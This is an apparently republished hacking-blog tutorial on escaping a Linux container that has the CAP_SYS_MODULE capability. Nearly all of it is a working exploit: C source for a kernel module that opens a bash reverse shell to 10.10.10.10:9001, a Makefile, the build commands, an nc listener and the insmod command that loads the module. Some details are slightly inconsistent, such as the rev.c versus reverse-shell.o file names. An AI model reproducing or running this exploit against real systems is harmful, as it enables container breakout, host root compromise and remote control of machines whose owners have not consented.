Breaking Out of Containers - Exploiting Sys_Module Capability
2021-09-07 05:18:00 Author: www.hackingdream.net(查看原文) 阅读量:90 收藏

Linux Capabilities are used to allow binaries (executed by non-root users) to perform privileged operations without providing them all root permissions. There are currently 40 capabilities supported by the Linux kernel. 

in this article we are going to see the process to exploit Cap_Sys_Module capability and gain a root shell or an extended shell. 

#List all Capabilities on the Target Machine
#cap_sys_module is exploitable 

capsh --print
Create a Reverse Shell Payload

#save the below code as rev.c and send it to target machine
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.10.10/9001 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
Create Makefile
#Save the file as Makefile upload it to target machine

obj-m +=reverse-shell.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

Compile the files 

export PATH=$PATH/usr/lib/gcc/x86_64-linux-gnu/10/
make clean
make all 
or #validate the version and the file path make -C /lib/modules/4.15.0-142-generic/build M=/root clean make -C /lib/modules/4.15.0-142-generic/build M=/root modules #start the shell on attacker machine nc -nvlp 9001 #Insert the kernel module insmod reverse-shell.ko

Well, Thats how you Break Out of Containers by Exploiting Sys_Module Capability 


文章来源: https://www.hackingdream.net/2021/09/breaking-out-of-containers-exploiting-cap-sys-module.html
如有侵权请联系:admin#unsafe.sh